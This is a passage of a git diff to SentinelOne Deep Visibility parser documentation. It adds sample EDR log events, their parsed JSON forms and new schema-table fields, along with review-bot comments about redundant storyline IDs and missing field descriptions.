\"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome\",\n \"src.process.sessionId\": 0,\n \"src.process.parent.pid\": 790\n}\n", + "event": { + "action": "DNS Resolved", + "category": [ + "network" + ], + "dataset": "cloud-funnel-2.0", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-26T08:44:30Z", + "agent": { + "version": "24.1.2.7444" + }, + "deepvisibility": { + "agent": { + "uuid": "75084C59-0F8A-479D-A9C4-2232C37D9D51" + }, + "event": { + "category": "dns", + "type": "DNS Resolved" + }, + "process": { + "parent": { + "storyline_id": "0A62D926-DFE7-4968-AA28-F0024BAC804D" + }, + "storyline_id": "0A62D926-DFE7-4968-AA28-F0024BAC804D" + } + }, + "dns": { + "answers": [ + { + "name": 
"edge-web-gew4.dual-gslb.spotify.com", + "type": "CNAME" + }, + { + "name": "2600:1901:1:4be::", + "type": "AAAA" + } + ], + "question": { + "name": "gew4-spclient.spotify.com", + "registered_domain": "spotify.com", + "subdomain": "gew4-spclient", + "top_level_domain": "com" + }, + "type": "answer" + }, + "host": { + "name": "MXY2XC6J7VJ", + "os": { + "family": "osx" + }, + "type": "laptop" + }, + "observer": { + "vendor": "SentinelOne" + }, + "process": { + "code_signature": { + "exists": true, + "subject_name": "" + }, + "command_line": "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=network --shared-files --field-trial-handle=1718379636,r,10310964397040083203,6939088771020272477,262144 --variations-seed-version=20240412-130119.249000 --seatbelt-client=25", + "executable": "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper", + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940", + "sha1": "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc", + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "name": "Google Chrome Helper", + "parent": { + "code_signature": { + "exists": false + }, + "command_line": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome", + "executable": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome", + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940", + "sha1": "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc", + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "name": "Google Chrome", + "pid": 790, + "start": "2024-04-15T07:56:24.335000Z", + "title": "Google Chrome", + "user": { + "name": "psinha" + }, + 
"working_directory": "/Applications/Google Chrome.app/Contents/MacOS" + }, + "pid": 1063, + "start": "2024-04-15T07:56:35.818000Z", + "title": "Google Chrome Helper", + "user": { + "name": "jdoe" + }, + "working_directory": "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS" + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", + "68b329da9893e34099c7d8ad5cb9c940", + "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc" + ], + "hosts": [ + "gew4-spclient.spotify.com" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "name": "jdoe" + } + } + + ``` + + === "driver_driverload.json" ```json @@ -363,6 +662,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "4735E7E7AB538ED5" + }, + "storyline_id": "4735E7E7AB538ED5" } }, "file": { @@ -481,6 +786,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "0447E5E7AB538ED5" + }, + "storyline_id": "DA84E5E7AB538ED5" } }, "file": { @@ -612,7 +923,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hash": { "sha256": "db780e2e5d8608f9a0bc77822ccbee64c8deece0120244b31af3fc4a8336d1aa" }, - "name": "msedge.exe" + "name": "msedge.exe", + "ossrc": { + "storyline_id": "14C2E6E7AB538ED5" + }, + "parent": { + "storyline_id": "96BFE6E7AB538ED5" + }, + "storyline_id": "14C2E6E7AB538ED5" } }, "file": { 
@@ -731,10 +1049,19 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": "file", "type": "File Rename" }, + "file": { + "old_path": "C:\\WindowsAzure\\Logs\\AggregateStatus\\aggregatestatus.json" + }, "host": { "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "D7D0E5E7AB538ED5" + }, + "storyline_id": "85D1E5E7AB538ED5" } }, "file": { 
@@ -823,6 +1150,133 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "fileoldpath.json" + + ```json + + { + "message": "{\"src.process.parent.isStorylineRoot\":false,\"event.category\":\"file\",\"src.process.parent.image.sha1\":\"0000000\",\"site.id\":\"00000000\",\"tgt.file.location\":\"Local\",\"src.process.parent.displayName\":\"pparent\",\"src.process.parent.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"src.process.tgtFileCreationCount\":1,\"src.process.indicatorInjectionCount\":0,\"src.process.moduleCount\":0,\"i.version\":\"preprocess-lib-1.0\",\"src.process.parent.name\":\"pname\",\"src.process.storyline.id\":\"00000-0000-0000-0000000\",\"src.process.indicatorReconnaissanceCount\":0,\"src.process.childProcCount\":0,\"aaaa.url\":\"redacted.sentinelone.net\",\"src.process.parent.eUserName\":\"aaaaaaaa\",\"src.process.crossProcessOpenProcessCount\":0,\"src.process.eUserName\":\"aaaaaaaa\",\"src.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"meta.event.name\":\"FILERENAME\",\"src.process.parent.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"src.process.indicatorExploitationCount\":0,\"src.process.parent.storyline.id\":\"0000000-0000-0000-00000000\",\"tgt.file.creationTime\":1722852662250,\"src.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"i.scheme\":\"edr\",\"site.name\":\"sitename\",\"src.process.netConnInCount\":0,\"event.time\":1722853381979,\"timestamp\":\"2024-08-05T10:23:01.979Z\",\"account.id\":\"00000000000\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"aaaaaaaaa\",\"src.process.image.sha1\":\"aaaaaaaaaaaaaa\",\"tgt.file.size\":750,\"src.process.isStorylineRoot\":false,\"src.process.parent.image.path\":\"\\/bin\\/pparent\",\"src.process.lUserName\":\"aaaaaaaa\",\"dataSource.vendor\":\"SentinelOne\",\"src.process.pid\":31304,\"tgt.file.isSigned\":\"unsigned\",\"src.process.cmdline\":\" \\/usr\\/cmd 
-\",\"dataSource.category\":\"security\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.parent.isNative64Bit\":false,\"src.process.parent.isRedirectCmdProcessor\":false,\"src.process.parent.rUserUid\":1111,\"src.process.crossProcessCount\":0,\"src.process.signedStatus\":\"unsigned\",\"event.id\":\"01J4H129Q4744MK0FX0CNXASK1_414\",\"src.process.image.path\":\"\\/usr\\/path\",\"src.process.tgtFileModificationCount\":2,\"src.process.indicatorEvasionCount\":0,\"src.process.netConnOutCount\":0,\"tgt.file.path\":\"\\/new\\/new\\/file\\/path\\/path\",\"src.process.eUserUid\":1111,\"src.process.lUserUid\":1111,\"src.process.crossProcessDupThreadHandleCount\":0,\"endpoint.os\":\"linux\",\"src.process.tgtFileDeletionCount\":0,\"src.process.startTime\":1722853381100,\"mgmt.id\":\"00000\",\"os.name\":\"Linux\",\"tgt.file.type\":\"UNKNOWN\",\"src.process.displayName\":\"aaaaaaaaa\",\"src.process.isNative64Bit\":false,\"src.process.parent.sessionId\":0,\"src.process.rUserUid\":1111,\"src.process.uid\":\"000000000-0000-0000-00000000000\",\"src.process.indicatorBootConfigurationUpdateCount\":0,\"src.process.indicatorInfostealerCount\":0,\"process.unique.key\":\"000000000-0000-0000-000000000\",\"src.process.parent.eUserUid\":112,\"agent.version\":\"1\",\"src.process.parent.uid\":\"000000000-0000-0000-0000000000000000\",\"src.process.parent.rUserName\":\"aaaaaaaaa\",\"src.process.sessionId\":0,\"src.process.netConnCount\":0,\"mgmt.osRevision\":\"Debian\",\"group.id\":\"000000000-0000-0000-00000000\",\"src.process.isRedirectCmdProcessor\":false,\"src.process.parent.startTime\":1722853381090,\"src.process.dnsCount\":0,\"endpoint.type\":\"server\",\"tgt.file.oldPath\":\"\\/old\\/path\\/name\\/tmp.aaaa\",\"trace.id\":\"00000000000\",\"src.process.rUserName\":\"aaaaaaaaa\",\"src.process.name\":\"aaaaa\",\"agent.uuid\":\"00000-0000-0000-000000\",\"src.process.parent.lUserName\":\"aaaaaaaa\",\"src.process.indicatorGeneralCount\":0,\"src.process.parent.lUserUid\":1111,\"src.pr
ocess.crossProcessOutOfStorylineCount\":0,\"packet.id\":\"000000-0000-0000-000000000000\",\"src.process.registryChangeCount\":0,\"src.process.indicatorPersistenceCount\":3,\"src.process.parent.signedStatus\":\"unsigned\",\"tgt.file.id\":\"00000-0000-0000-0000000000\",\"account.name\":\"account_name\",\"event.type\":\"File Rename\",\"task.path\":\"\\/var\\/aaa\\/aaa\\/aaaa\\/aaaa\",\"src.process.indicatorPostExploitationCount\":0,\"src.process.parent.pid\":111111}", + "event": { + "action": "File Rename", + "category": [ + "file" + ], + "dataset": "cloud-funnel-2.0", + "type": [ + "change" + ] + }, + "@timestamp": "2024-08-05T10:23:01.979000Z", + "agent": { + "version": "1" + }, + "deepvisibility": { + "agent": { + "trace_id": "00000000000", + "uuid": "00000-0000-0000-000000" + }, + "event": { + "category": "file", + "type": "File Rename" + }, + "file": { + "old_path": "/old/path/name/tmp.aaaa" + }, + "host": { + "os": { + "revision": "Debian" + } + }, + "process": { + "parent": { + "storyline_id": "0000000-0000-0000-00000000" + }, + "storyline_id": "00000-0000-0000-0000000" + } + }, + "file": { + "code_signature": { + "exists": false + }, + "created": "2024-08-05T10:11:02.250000Z", + "directory": "/new/new/file/path", + "name": "path", + "path": "/new/new/file/path/path", + "size": 750 + }, + "host": { + "name": "aaaaaaaaa", + "os": { + "family": "linux", + "name": "Linux" + }, + "type": "server" + }, + "observer": { + "vendor": "SentinelOne" + }, + "process": { + "code_signature": { + "exists": false + }, + "command_line": " /usr/cmd -", + "executable": "/usr/path", + "hash": { + "sha1": "aaaaaaaaaaaaaa" + }, + "name": "aaaaa", + "parent": { + "code_signature": { + "exists": false + }, + "executable": "/bin/pparent", + "hash": { + "sha1": "0000000" + }, + "name": "pname", + "pid": 111111, + "real_user": { + "id": "1111", + "name": "aaaaaaaaa" + }, + "start": "2024-08-05T10:23:01.090000Z", + "title": "pparent", + "user": { + "id": "112", + "name": "aaaaaaaa" + }, + 
"working_directory": "/bin" + }, + "pid": 31304, + "real_user": { + "id": "1111", + "name": "aaaaaaaaa" + }, + "start": "2024-08-05T10:23:01.100000Z", + "title": "aaaaaaaaa", + "user": { + "id": "1111", + "name": "aaaaaaaa" + }, + "working_directory": "/usr" + }, + "related": { + "hash": [ + "0000000", + "aaaaaaaaaaaaaa" + ], + "user": [ + "aaaaaaaa" + ] + }, + "user": { + "name": "aaaaaaaa" + } + } + + ``` + + === "group_groupcreation.json" ```json @@ -834,6 +1288,11 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "dataset": "cloud-funnel-2.0" }, "@timestamp": "2023-03-30T15:35:43.346000Z", + "action": { + "properties": { + "Path": "C:\\Users\\john.doe\\Desktop\\test.reg" + } + }, "agent": { "version": "22.3.2.373" }, @@ -858,7 +1317,11 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "sha1": "8b3d7f4397dd79d66b753745a676da89439ed38e" }, "path": "C:\\Users\\john.doe\\Desktop\\test.reg" - } + }, + "parent": { + "storyline_id": "96BFE6E7AB538ED5" + }, + "storyline_id": "8EE6E6E7AB538ED5" } }, "host": { @@ -970,6 +1433,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "description": "Code injection to other process memory space during the target process' initialization MITRE: Defense Evasion {T1055.012}, Privilege Escalation {T1055.012}", "metadata": "To Process[ Name: \"msedge.exe\", Pid: \"8064\", UID: \"F328E6E7AB538ED5\", TrueContextID: \"2D1EE6E7AB538ED5\", IntegrityLevel: \"Low\", RelationToSource: \"Child\" ], File Path: \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"", "name": "PreloadInjection" + }, + "process": { + "parent": { + "storyline_id": "2D1EE6E7AB538ED5" + }, + "storyline_id": "2D1EE6E7AB538ED5" } }, "host": { 
@@ -1078,6 +1547,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "EE96E5E7AB538ED5" + }, + "storyline_id": "EE96E5E7AB538ED5" } }, "destination": { @@ -1207,6 +1682,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "0591E6E7AB538ED5" + }, + "storyline_id": "1B91E6E7AB538ED5" } }, "destination": { @@ -1336,6 +1817,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "B491E6E7AB538ED5" + }, + "storyline_id": "B491E6E7AB538ED5" } }, "destination": { @@ -1473,6 +1960,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "Debian GNU/11 (bullseye) 5.10.0-21-cloud-amd64" } + }, + "process": { + "parent": { + "storyline_id": "55a4cfe4-1718-2ae2-dc40-bc3f342f0eca" + }, + "storyline_id": "55a4d014-9141-dea7-0774-371da18a6469" } }, "host": { @@ -1596,6 +2089,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "Debian GNU/11 (bullseye) 5.10.0-21-cloud-amd64" } + }, + "process": { + "parent": { + "storyline_id": "55d21a32-95e8-7a56-ad57-a9e6aac5a7bd" + }, + "storyline_id": "55d21a33-24e0-2280-8049-e395c2fe0885" } }, "host": { @@ -1707,6 +2206,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "process": { + "parent": { + "storyline_id": "55d21a32-c658-5f3f-5d8f-57420736161e" + }, + "storyline_id": "55d21a32-c658-5f3f-5d8f-57420736161e", "target": { "command_line": " ip -6 -a -o address", "executable": "/usr/bin/ip", 
@@ -1714,6 +2217,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "sha1": "3c954614f2c9af7181e4d00e00ab4485e4a9c33f" }, "name": "ip", + "storyline_id": "55d21a32-c658-5f3f-5d8f-57420736161e", "title": "ip", "working_directory": "/usr/bin" } @@ -1848,7 +2352,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hash": { "sha256": "add683a6910abbbf0e28b557fad0ba998166394932ae2aca069d9aa19ea8fe88" }, - "name": "svchost.exe" + "name": "svchost.exe", + "ossrc": { + "storyline_id": "4A96E5E7AB538ED5" + }, + "parent": { + "storyline_id": "4896E5E7AB538ED5" + }, + "storyline_id": "6196E5E7AB538ED5" } }, "host": { @@ -1992,7 +2503,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hash": { "sha256": "add683a6910abbbf0e28b557fad0ba998166394932ae2aca069d9aa19ea8fe88" }, - "name": "svchost.exe" + "name": "svchost.exe", + "ossrc": { + "storyline_id": "AD36E7E7AB538ED5" + }, + "parent": { + "storyline_id": "AB36E7E7AB538ED5" + }, + "storyline_id": "C136E7E7AB538ED5" } }, "host": { @@ -2129,12 +2647,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "sha256": "20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50" }, "name": "backgroundTaskHost.exe", + "ossrc": { + "parent": { + "storyline_id": "5696E5E7AB538ED5" + }, + "storyline_id": "5696E5E7AB538ED5" + }, "parent": { "command_line": "sihost.exe", "executable": { "name": "C:\\Windows\\System32\\sihost.exe" - } + }, + "storyline_id": "BE98E5E7AB538ED5" }, + "storyline_id": "86B6E5E7AB538ED5", "target": { "command_line": "C:\\Windows\\System32\\RuntimeBroker.exe -Embedding", "executable": "C:\\Windows\\System32\\RuntimeBroker.exe", 
@@ -2144,6 +2670,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "sha256": "e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628" }, "name": "RuntimeBroker.exe", + "storyline_id": "86B6E5E7AB538ED5", "title": "Runtime Broker", "working_directory": "C:\\Windows\\System32" } @@ -2261,6 +2788,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "14C2E6E7AB538ED5" + }, + "storyline_id": "14C2E6E7AB538ED5" } }, "host": { @@ -2379,6 +2912,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "B91AE6E7AB538ED5" + }, + "storyline_id": "B91AE6E7AB538ED5" } }, "host": { @@ -2505,7 +3044,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hash": { "sha256": "a8b9b1d63b8340cb1292d8edcd2c70702d17e9a254ec4b215c844d5eefb949c9" }, - "name": "WaAppAgent.exe" + "name": "WaAppAgent.exe", + "ossrc": { + "storyline_id": "F31AE6E7AB538ED5" + }, + "parent": { + "storyline_id": "381AE6E7AB538ED5" + }, + "storyline_id": "B91AE6E7AB538ED5" } }, "host": { @@ -2623,6 +3169,21 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "381AE6E7AB538ED5" + }, + "storyline_id": "C21AE6E7AB538ED5" + }, + "registry": { + "old": { + "data": { + "strings": [ + "0x01D95E36B1CF068C" + ] + } + } } }, "host": { 
@@ -2749,7 +3310,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hash": { "sha256": "3519db09c7d58615c5a5a8ef508e163e63ecb428f113021e0e3cd47fb7f39c9e" }, - "name": "mmc.exe" + "name": "mmc.exe", + "ossrc": { + "storyline_id": "4E1AE6E7AB538ED5" + }, + "parent": { + "storyline_id": "FA1CE6E7AB538ED5" + }, + "storyline_id": "5084E6E7AB538ED5" }, "scheduled_task": { "name": "\\Task John" @@ -2841,6 +3409,11 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "dataset": "cloud-funnel-2.0" }, "@timestamp": "2023-03-30T15:01:01.660000Z", + "action": { + "properties": { + "Path": "C:\\Windows\\System32\\pcasvc.dll" + } + }, "agent": { "version": "22.3.2.373" }, @@ -2873,7 +3446,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hash": { "sha256": "b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa" }, - "name": "rundll32.exe" + "name": "rundll32.exe", + "ossrc": { + "storyline_id": "1F91E6E7AB538ED5" + }, + "parent": { + "storyline_id": "4E1AE6E7AB538ED5" + }, + "storyline_id": "7322E6E7AB538ED5" }, "scheduled_task": { "name": "\\Microsoft\\Windows\\Application Experience\\PcaPatchDbTask" @@ -3005,6 +3585,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "F81CE6E7AB538ED5" + }, + "storyline_id": "FA1CE6E7AB538ED5" } }, "host": { 
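Review bot: `process.target.storyline_id` is added in the `@@ -1707` and `@@ -2129` hunks with exactly the value already in `process.storyline_id` (`55d21a32-c658-5f3f-5d8f-57420736161e` and `86B6E5E7AB538ED5`), so as documented it is redundant; if the raw event carries a distinct target storyline, the sample should show a case where it differs, otherwise drop the field. The `ossrc` object is also shaped differently across hunks: `@@ -2129` emits both `ossrc.parent.storyline_id` and `ossrc.storyline_id`, while `@@ -1848`, `@@ -1992`, `@@ -2505`, `@@ -2749` and `@@ -2873` emit only `ossrc.storyline_id`. Either the parent id is conditionally present, in which case the field table should say so, or one of the two mappings is missing it.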
@@ -3109,6 +3695,8 @@ The following table lists the fields that are extracted, normalized under the EC |`@timestamp` | `date` | Date/time when the event originated. | |`action.properties.IpAddress` | `keyword` | The type of the Logon | |`action.properties.LogonType_tmp` | `keyword` | The type of the Logon | +|`action.properties.Path` | `keyword` | | +|`action.properties.ScriptBlockText` | `keyword` | | |`action.properties.TargetDomainName` | `keyword` | | |`action.properties.TargetUserName` | `keyword` | | |`action.properties.TargetUserSid` | `keyword` | | @@ -3120,6 +3708,7 @@ The following table lists the fields that are extracted, normalized under the EC |`deepvisibility.driver.hash.sha256` | `keyword` | | |`deepvisibility.event.category` | `keyword` | | |`deepvisibility.event.type` | `keyword` | | +|`deepvisibility.file.old_path` | `keyword` | | |`deepvisibility.host.os.revision` | `keyword` | | |`deepvisibility.indicator.category` | `keyword` | | |`deepvisibility.indicator.description` | `keyword` | | 
@@ -3131,17 +3720,23 @@ The following table lists the fields that are extracted, normalized under the EC |`deepvisibility.process.executable.name` | `keyword` | | |`deepvisibility.process.hash.sha256` | `keyword` | | |`deepvisibility.process.name` | `keyword` | | +|`deepvisibility.process.ossrc.parent.storyline_id` | `keyword` | | +|`deepvisibility.process.ossrc.storyline_id` | `keyword` | | |`deepvisibility.process.parent.activecontent.path` | `keyword` | | |`deepvisibility.process.parent.command_line` | `keyword` | | |`deepvisibility.process.parent.executable.name` | `keyword` | | +|`deepvisibility.process.parent.storyline_id` | `keyword` | | +|`deepvisibility.process.storyline_id` | `keyword` | | |`deepvisibility.process.target.command_line` | `keyword` | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. | |`deepvisibility.process.target.executable` | `keyword` | Absolute path to the process executable. | |`deepvisibility.process.target.hash.md5` | `keyword` | MD5 hash. | |`deepvisibility.process.target.hash.sha1` | `keyword` | SHA1 hash. | |`deepvisibility.process.target.hash.sha256` | `keyword` | SHA256 hash. | |`deepvisibility.process.target.name` | `keyword` | Process name. | +|`deepvisibility.process.target.storyline_id` | `keyword` | | |`deepvisibility.process.target.title` | `keyword` | | |`deepvisibility.process.target.working_directory` | `keyword` | The working directory of the process. | +|`deepvisibility.registry.old.data.strings` | `keyword` | | |`deepvisibility.scheduled_task.name` | `keyword` | Scheduled task name | |`deepvisibility.script.app_name` | `keyword` | | |`deepvisibility.script.content` | `keyword` | | 
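Review bot: the nine new rows in the field table (`action.properties.Path`, `action.properties.ScriptBlockText`, `deepvisibility.file.old_path`, the five `storyline_id` rows and `deepvisibility.registry.old.data.strings`) ship with an empty description column, while neighbouring rows such as `deepvisibility.process.target.command_line` are documented. A one-liner each is enough, for example `SentinelOne Storyline (TrueContext) ID of the process` for `deepvisibility.process.storyline_id`, `Previous path of a renamed file` for `deepvisibility.file.old_path` and `Previous data of the modified registry value` for `deepvisibility.registry.old.data.strings`; for `action.properties.Path`, say what distinguishes it from the `path` already emitted for the same event in the `@@ -858` hunk (`C:\Users\john.doe\Desktop\test.reg` appears in both). While here: the existing `action.properties.IpAddress` row reads `The type of the Logon`, copied from the `LogonType_tmp` row, and `LogonType_tmp` itself leaks a temporary field name into the public schema.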
diff --git a/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340_sample.md b/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340_sample.md index a323e1fbde..470763a478 100644 --- a/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340_sample.md +++ b/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340_sample.md 
@@ -149,6 +149,138 @@ In this section, you will find examples of raw logs as generated natively by the +=== "commandscript_2" + + + ```json + { + "src.process.parent.isStorylineRoot": false, + "event.category": "command_script", + "tgt.file.modificationTime": -11644473600000, + "src.process.parent.image.sha1": "99ae9c73e9bee6f9c76d6f4093a9882df06832cf", + "site.id": "1470095163515336467", + "src.process.image.binaryIsExecutable": true, + "src.process.parent.displayName": "Windows Command Processor", + "src.process.user": "AUTORITE NT\\Syst\u00e8me", + "src.process.parent.subsystem": "SYS_WIN32", + "src.process.indicatorRansomwareCount": 0, + "src.process.crossProcessDupRemoteProcessHandleCount": 7, + "src.process.activeContent.signedStatus": "unsigned", + "src.process.tgtFileCreationCount": 0, + "src.process.indicatorInjectionCount": 0, + "src.process.moduleCount": 1800, + "i.version": "preprocess-lib-1.0", + "src.process.parent.name": "cmd.exe", + "src.process.activeContentType": "FILE", + "src.process.parent.activeContent.id": "3EFA3EFA3EFA3EFA", + "src.process.image.md5": "097ce5761c89434367598b34fe32893b", + "src.process.storyline.id": "7FABCCD60C10799B", + "src.process.indicatorReconnaissanceCount": 69, + "src.process.childProcCount": 6, + "mgmt.url": "euce1-sns-mssp.sentinelone.net", + "src.process.crossProcessOpenProcessCount": 0, + "cmdScript.isComplete": true, + "src.process.subsystem": "SYS_WIN32", + "meta.event.name": "SCRIPTS", + "src.process.parent.integrityLevel": "SYSTEM", + "src.process.indicatorExploitationCount": 0, + "src.process.parent.storyline.id": "7FABCCD60C10799B", + "tgt.file.creationTime": -11644473600000, + "src.process.integrityLevel": "SYSTEM", + "i.scheme": "edr", + "site.name": "Default site", + "src.process.netConnInCount": 0, + "event.time": 1722588221803, + "timestamp": "2024-08-02T08:43:41.803Z", + "account.id": "1470095162995242762", + "dataSource.name": "SentinelOne", + "endpoint.name": "ntrsql15", + "src.process.image.sha1": 
"044a0cf1f6bc478a7172bf207eef1e201a18ba02", + "tgt.file.size": 50105, + "cmdScript.applicationName": "PowerShell_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe_10.0.14393.0", + "src.process.isStorylineRoot": false, + "src.process.parent.image.path": "C:\\Windows\\System32\\cmd.exe", + "tgt.file.sha1": "4b09001438b32e54b91cbe27685c75a316f8cdf5", + "dataSource.vendor": "SentinelOne", + "src.process.pid": 3744, + "src.process.parent.activeContent.hash": "1b11fdf894b9a205b690add505ff5f2193c1fe48", + "tgt.file.isSigned": "signed", + "src.process.cmdline": "powershell -executionpolicy bypass -file \"c:\\zabbix\\scripts\\sb.mssql.ps1\" poller RUIWS01 ", + "src.process.publisher": "MICROSOFT WINDOWS", + "dataSource.category": "security", + "src.process.crossProcessThreadCreateCount": 0, + "src.process.parent.isNative64Bit": false, + "src.process.parent.activeContentType": "CLI", + "src.process.parent.isRedirectCmdProcessor": false, + "src.process.parent.activeContent.path": "\\\\Unknown device\\Unknown file", + "src.process.crossProcessCount": 7, + "src.process.signedStatus": "signed", + "tgt.file.isExecutable": false, + "event.id": "01J4945B0JAAYZXWF8ZG4A0VMZ_638", + "src.process.parent.cmdline": "cmd /C \"powershell -executionpolicy bypass -file \"c:\\zabbix\\scripts\\sb.mssql.ps1\" poller RUIWS01 \"", + "cmdScript.content": "{ updateInfo_Serveurs -instance_name $instance -datas_res $res_infos }", + "src.process.image.path": "C:\\Windows\\System32\\WINDOWSPOWERSHELL\\V1.0\\powershell.EXE", + "src.process.tgtFileModificationCount": 21, + "src.process.indicatorEvasionCount": 101, + "src.process.netConnOutCount": 0, + "cmdScript.sha256": "b285d770802aac13330fd7d2a0ade3c9a7adf575d160a81dfc30614c7a89e775", + "tgt.file.path": "C:\\zabbix\\scripts\\sb.mssql.ps1", + "tgt.file.extension": "ps1", + "src.process.crossProcessDupThreadHandleCount": 0, + "endpoint.os": "windows", + "src.process.tgtFileDeletionCount": 0, + "src.process.startTime": 1722588220577, + 
"mgmt.id": "16205", + "os.name": "Windows Server 2016 Standard", + "tgt.file.type": "UNKNOWN", + "src.process.activeContent.id": "B76839D30C10799B", + "src.process.displayName": "Windows PowerShell", + "src.process.activeContent.path": "C:\\zabbix\\scripts\\sb.mssql.ps1", + "src.process.isNative64Bit": false, + "src.process.parent.sessionId": 0, + "src.process.uid": "07AED4D60C10799B", + "src.process.parent.image.md5": "f4f684066175b77e0c3a000549d2922c", + "src.process.indicatorBootConfigurationUpdateCount": 0, + "src.process.indicatorInfostealerCount": 0, + "process.unique.key": "07AED4D60C10799B", + "cmdScript.originalSize": 140, + "agent.version": "23.4.4.223", + "src.process.parent.uid": "05AED4D60C10799B", + "src.process.parent.image.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", + "src.process.sessionId": 0, + "src.process.netConnCount": 0, + "mgmt.osRevision": "14393", + "group.id": "7FABCCD60C10799B", + "src.process.isRedirectCmdProcessor": false, + "src.process.verifiedStatus": "verified", + "src.process.parent.publisher": "MICROSOFT WINDOWS", + "src.process.parent.startTime": 1722588220333, + "src.process.dnsCount": 0, + "endpoint.type": "server", + "trace.id": "01J4945B0JAAYZXWF8ZG4A0VMZ", + "src.process.name": "powershell.EXE", + "agent.uuid": "f373bf5f3c5541a49aad49c5d39deac8", + "src.process.activeContent.hash": "4b09001438b32e54b91cbe27685c75a316f8cdf5", + "src.process.image.sha256": "ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436", + "src.process.indicatorGeneralCount": 161, + "src.process.crossProcessOutOfStorylineCount": 1, + "packet.id": "C6BB63A4EEC044B7BFEDC8B39D2594AD", + "src.process.registryChangeCount": 0, + "src.process.indicatorPersistenceCount": 0, + "src.process.parent.signedStatus": "signed", + "src.process.parent.user": "AUTORITE NT\\Syst\u00e8me", + "tgt.file.id": "B76839D30C10799B", + "account.name": "S - SOCRAM BANQUE", + "event.type": "Command Script", + "task.path": 
